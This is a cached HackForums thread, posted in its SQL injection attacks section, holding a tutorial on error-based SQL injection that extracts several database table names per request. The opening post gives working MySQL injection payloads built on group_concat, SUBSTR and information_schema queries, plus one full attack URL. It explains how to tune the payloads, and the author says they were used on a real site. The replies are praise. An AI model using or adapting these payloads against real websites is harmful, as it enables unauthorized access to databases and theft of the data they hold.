<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4127535" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4127535" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4127535</a>. It is a snapshot of the page as it appeared on 8 Apr 2014 14:03:13 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4127535" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:Qj4JZMlNd7IJ:www.hackforums.net/showthread.php%3Ftid%3D4127535&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] Error based injection with multiple results - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] Error based injection with multiple results"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4127535"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-08-2014, 06:03 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] Error based injection with multiple results</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4127535" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/rating.js"></script><div id="success_rating_4127535" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4127535"><li style="width: 0%" class="current_rating" id="current_rating_4127535">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4127535&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4127535&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4127535&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4127535&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4127535&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4127535" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4127535_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4127535" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4127535&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4127535");
// -->
</script><div><strong>[SQLi tutorial] Error based injection with multiple results</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid39031147" id="pid39031147"></a><table class="tborder" style="border-top-width: 0; " id="post_39031147" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-21-2014, 04:23 PM <span id="edited_by_39031147"><span class="smalltext">(This post was last modified: 03-21-2014 04:35 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39031147#pid39031147">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 139<br>Posts: 2,210<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39031147">With
 error based injection we intentionally try to produce an error and hope
 part of the error report will be some data from server.<br><br>If we want to get table name we usually use something like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">or&nbsp;</span><span style="color: #66CCFF">1&nbsp;group&nbsp;by&nbsp;concat_ws</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x7e</span><span style="color: #7AC07C">,(</span><span style="color: #66CCFF">select&nbsp;table_name&nbsp;from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()&nbsp;</span><span style="color: #66CCFF">limit&nbsp;0</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">floor</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">rand</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)*</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">))&nbsp;</span><span style="color: #66CCFF">having&nbsp;min</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;or&nbsp;</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">--&nbsp;<br></span></code></div></div></div><br>and get back table name as part of the error response:<br><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/ca0af969b1cfd7d3a15d2c6b31e3e9c6.jpg" alt="[Image: ca0af969b1cfd7d3a15d2c6b31e3e9c6.jpg]" border="0"><br><br>From picture we can see first table name is <span style="color: #32CD32;">autores</span>. If we want next table name we change command above in limit part and change it from <span style="color: #FFA500;">limit 0,1</span> to <span style="color: #FFA500;">limit 1,1</span> and we will get next table name <span style="color: #32CD32;">banners</span>. <span style="color: #FFA500;">Limit 2,1</span> will give us table name <span style="color: #32CD32;">contactos</span> ...<br><br>So we get back one data (column name/table name/data from column...) in one execution.<br><br>Using <span style="color: #FFD700;">union select</span> based injection we know we can dump complete database <span style="color: #00BFFF;">using dump in one shot</span> (DIOS) syntax. See for example my four parts <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">tutorials series</span></a>. It would be nice if we could do the same thing with <span style="color: #00BFFF;">error based</span> injection.<br><br><span style="font-size: x-large;"><span style="color: #FFA500;">Well, we can!!!</span></span> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br>It is not full dump as in <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>,
 but still we can get few column names/few table names/few data from 
columns in one execution. That way we don't need so many changes in our 
syntax (limit part) as explained above:<br><br><span style="color: #FFD700;">limit 0,1 (for table #1)<br>limit 1,1 (for table #2)<br>limit 2,1 (for table #3)<br>...<br>limit XX,1 (for table #XX)</span><br><br>We can use following syntax (example for tables):<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//www.some_vulnerable_site.com/index.php=1&nbsp;and&nbsp;1&nbsp;group&nbsp;by&nbsp;concat(0x3c62723e,&nbsp;if(@a=0,concat(char(@a:=1),(SELECT&nbsp;SUBSTR(group_concat(table_name&nbsp;separator&nbsp;0x3c62723e),1,128)&nbsp;FROM&nbsp;information_schema.tables&nbsp;WHERE&nbsp;table_schema=database())),@a:=0))having&nbsp;min(0)--&nbsp;-&nbsp;<br></span></code></div></div></div><br>and result will be:<br><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/9a241fe71bd0a78fb9e147594eecdc9b.jpg" alt="[Image: 9a241fe71bd0a78fb9e147594eecdc9b.jpg]" border="0"><br><br>We can see few table names in one execution <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> Four complete table names and starting letters of table name #5.<br><br>We played with local variables and function IF() in our syntax. But the most important part of that code is function <span style="color: #32CD32;">substring</span>. It's syntax is:<br><br><span style="font-weight: bold;">SUBSTR(</span><span style="color: #FFD700;">string</span>, <span style="color: #32CD32;">position</span>, <span style="color: #00BFFF;">length</span><span style="font-weight: bold;">)</span><br><br>We put <span style="color: #FFD700;"><span style="font-weight: bold;">group_concat(table name)</span></span> as string in function SUBSTR. Our first chosen position was <span style="font-weight: bold;"><span style="color: #32CD32;">1</span></span> and selected length was <span style="font-weight: bold;"><span style="color: #00BFFF;">128</span></span>.<br><br>You can play with <span style="color: #00BFFF;">length</span>
 parameter. Sometimes that number can be higher (400), but if you put it
 too high error injection won't work any more (you will get back 
original site content as if you didn't inject at all)!!!<br><br>I used &lt;br&gt; (0x3c62723e in hex) as SEPARATOR in <span style="font-weight: bold;">group_concat()</span> so every table name is in new line (for better readability).<br><br>If we want to see next few table names we will change <span style="color: #32CD32;">position</span> number from <span style="font-weight: bold;"><span style="color: #32CD32;">1</span></span> (in our first execution) to some higher number (like <span style="font-weight: bold;"><span style="color: #32CD32;">50</span></span>).<br><br>So in my case, with site I used, command:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">1&nbsp;group&nbsp;by&nbsp;concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,&nbsp;if(@</span><span style="color: #66CCFF">a</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">char</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">a</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">SELECT&nbsp;SUBSTR</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name&nbsp;separator&nbsp;0x3c62723e</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">50</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">128</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">FROM&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;WHERE&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())),@</span><span style="color: #66CCFF">a</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">))</span><span style="color: #66CCFF">having&nbsp;min</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)--&nbsp;-&nbsp;<br></span></code></div></div></div>gave me next tables:<br><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/0df3801b1a628141f7fcc16e964bcd37.jpg" alt="[Image: 0df3801b1a628141f7fcc16e964bcd37.jpg]" border="0"><br><br>If
 you will choose too small number you will see part of table names you 
have already retrieved their names in your previous SQLi execution. If 
you will change it to too high number, you will miss some table names 
(or characters from some table name).<br><br>So you should experiment with both numbers (<span style="color: #32CD32;">position</span> / <span style="color: #00BFFF;">length</span>) for the best result.<br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39031147"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39031147" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39032061" id="pid39032061"></a><table class="tborder" style="margin-top: 5px; " id="post_39032061" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-21-2014, 05:17 PM <span id="edited_by_39032061"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39032061#pid39032061">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2228540"><span class="group2">dr.wine</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"> <br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 7<br>Joined: Mar 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2228540"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39032061">interesting explanation bro and very easy to understand for new learning<br>nice share</div><div class="post_meta" id="post_meta_39032061"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2228540" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39032061" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39033218" id="pid39033218"></a><table class="tborder" style="margin-top: 5px; " id="post_39033218" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-21-2014, 06:23 PM <span id="edited_by_39033218"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39033218#pid39033218">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 20<br>Posts: 384<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">43</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39033218">well explained <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br>i used in the past a union-error-based-mixed technique similar to this - but yours is quite shorter (query) <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>thx for sharing!</div><div class="post_meta" id="post_meta_39033218"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39033218" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39035719" id="pid39035719"></a><table class="tborder" style="margin-top: 5px; " id="post_39035719" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-21-2014, 09:31 PM <span id="edited_by_39035719"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39035719#pid39035719">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/thumbnail.jpg" alt="" height="95" width="54"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><span class="group2">makmaniac</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 83<br>Joined: Feb 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1179043"><strong class="reputation_positive">14</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39035719">WOW .. A neat Trick .. Good Job <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> and thanks for sharing .. <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39035719"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1179043" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39035719" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39037301" id="pid39037301"></a><table class="tborder" style="margin-top: 5px; " id="post_39037301" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-22-2014, 12:41 AM <span id="edited_by_39037301"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39037301#pid39037301">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1847579"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/dragonbyrd1.gif" alt="" height="72" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1847579"><span class="group2">sweetoow</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" 